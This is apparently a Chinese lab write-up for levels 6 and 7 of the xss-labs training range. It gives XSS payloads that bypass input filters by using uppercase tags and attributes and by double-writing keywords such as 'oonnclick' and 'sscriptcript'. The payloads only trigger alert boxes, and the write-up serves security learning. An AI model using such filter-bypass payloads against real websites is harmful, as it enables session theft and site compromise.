5、xss-labs之level6

一、level6-----大小写绕过

1、测试分析

测试了之前用过的payload,发现都不行,并且level4使用的Java伪协议也不行,可以得出<>、script、onclick都被过滤

2、构造payload

因为href被过滤,可以试一下大写HREF

初试payload:

"><a HREF=javascript:alert(1)>xss<a/>//

既然可以大写绕过,那payload就多了,只要能够将value或者input标签闭合并且大写就都可以

"><a HREF=javascript:alert(1)>超链接,并弹窗</a>//

"ONCLICK=alert(1)//

"ONCLICK="alert(1)

"><SCRIPT>alert(1)</SCRIPT>//

二、level7-----双写绕过

1、测试分析

测试过的额payload有:

"οnclick=alert(1)//

"οnclick="alert(1)

"><script>alert(1)</script>//

"><a href=javascript:alert(1)>超链接,并弹窗</a>//

传入payload后,查看源码发现,过滤的有

on

script

href

大小写

2、构造payload

可以采用双写绕过,payload:

"oonnclick=alert(1)//

"oonnclick="alert(1)

"><sscriptcript>alert(1)</sscriptcript>//

"><a hhrefref=javasscriptcript:alert(1)>超链接,并弹窗</a>//

总结:

1、绕过方法还可以使用大写绕过

2、将input标签或者value其中一个闭合就可以尝试插入xss

3、双写可以绕过过滤

相关推荐
小二·2 分钟前
Python Web 开发进阶实战:AI 原生硬件接口 —— 在 Flask + MicroPython 中构建边缘智能设备控制平台
前端·人工智能·python
ElasticPDF-新国产PDF编辑器8 分钟前
基于 PDF.js 的 PDF 文字编辑解决方案,纯前端 SDK,跨平台、框架无关、Web 原生
前端·javascript·pdf
带带弟弟学爬虫__9 分钟前
速通新Baidu Frida检测
前端·javascript·vue.js·python·网络爬虫
好学且牛逼的马19 分钟前
ES6 核心语法精讲
前端·ecmascript·es6
GISer_Jing21 分钟前
一次编码,七端运行:Taro多端统一架构深度解析与电商实战
前端·aigc·taro
michael_ouyang36 分钟前
IM 消息收发流程方案选型
前端·websocket·网络协议·typescript·electron
上海云盾-小余37 分钟前
WAF性能优化:如何平衡安全防护与网站访问速度?
网络·安全·性能优化
Y淑滢潇潇39 分钟前
WEB 作业 三个练习题
前端·javascript·css3
静小谢42 分钟前
前端mock假数据工具JSON Server使用笔记
前端·笔记·json
Whoami!44 分钟前
⓫⁄₅ ⟦ OSCP ⬖ 研记 ⟧ Windows权限提升 ➱ 利用PowerShell获取敏感信息
网络安全·信息安全·powershell·windows日志